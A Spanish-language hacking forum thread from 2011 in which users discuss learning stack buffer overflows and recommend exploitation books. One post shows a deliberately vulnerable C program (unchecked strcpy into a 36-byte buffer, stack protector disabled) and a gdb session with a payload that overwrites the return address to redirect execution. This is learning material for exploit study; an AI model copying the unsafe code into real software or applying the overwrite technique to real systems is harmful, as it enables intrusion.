Duda sobre buffer overflow

Iniciado por pianista, 23 Diciembre 2011, 14:48 PM

0 Miembros y 2 Visitantes están viendo este tema.

buscador-tecnologico

ostias, y ese libro? parece interesante,no? el titulo del libro es: shellcoders sobre exploits? de que escritor?


100000 gracias y feliz navidad amigos!

Sagrini

#11
Ahora mismo estoy un poco liadillo, te paso una url que tal vez te sirva y en un ratillo me pongo ;)
http://foro.elhacker.net/bugs_y_exploits/first_bof_linux_attack_sagrini_2010_elhackernet_funciona-t317514.0.html

pianista

Muchas gracias  ;)

Te lo agradezco

Saludos

AlbertoBSD

Pianista muy buenos dias, y exito este año!

¿Que libro estas siguiendo?

La idea es la misma, sobreescribir la direccion de retorno con aquella que quieras que se ejecute, en este caso quieres que se ejecute 2 veces el printf dentro de la funcion return_input

Saludos.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

Sagrini

#14

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int vuln (char *buff)
{
    char buffer [36];
    strcpy (buffer, buff);
}

int main (int argc, char *argv [])
{
    vuln (argv [1]);
}

int feo ()
{
    printf ("Eres feo!!!");
    exit (0);
}


sagrini@pc11-1:~/Escritorio$ nano code.c
sagrini@pc11-1:~/Escritorio$ gcc -o code code.c --no-stack-protector
sagrini@pc11-1:~/Escritorio$ gdb -q code
(gdb) r $(perl -e 'print "A"x36 . "BBBB"x3')
Program received signal SIGSEGV, Segmentation fault.
0x08048408 in __do_global_dtors_aux ()
(gdb)
(gdb) x/x feo
0x8048489 <feo>: 0x83e58955
(gdb) x/x feo
0x8048489 <feo>: 0x83e58955
(gdb) r $(perl -e 'print "\x90"x36 . "\x89\x84\x04\x08"x5')
Eres feo!!!
(gdb) quit
sagrini@pc11-1:~/Escritorio$


Ahora modifico para que funcione con una shellcode ;)

adulti

¿Que libro estas siguiendo?

La idea es la misma, sobreescribir la direccion de retorno con aquella que quieras que se ejecute, en este caso quieres que se ejecute 2 veces el printf dentro de la funcion return_input

AlbertoBSD

Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

Sagrini

El que? Lo mio, perfectamente.
Os recomiendo el libro "Hacking, técnicas avanzadas", de Jon Erickson. Es buenisimo.

<<<-Basura->>>

Mm.. se que el comentario no viene al caso, pero podrías pasar el link del libro para descargarlo y yo también leerlo  :huh:
<<<--Basura-->>>

pianista

Disculpad, las fiestas navideñas es lo que tienen, ya estoy de nuevo por aquí jeje.

Ahora lo voy a probar que he estado liado desde entonces.

El libro es: The Shellcoders handbook

Lo compré en amazon aunque tiene bastantes años.

Luego por otro lado había uno muy majo que era el de The art of exploitation o algo así.

Saludos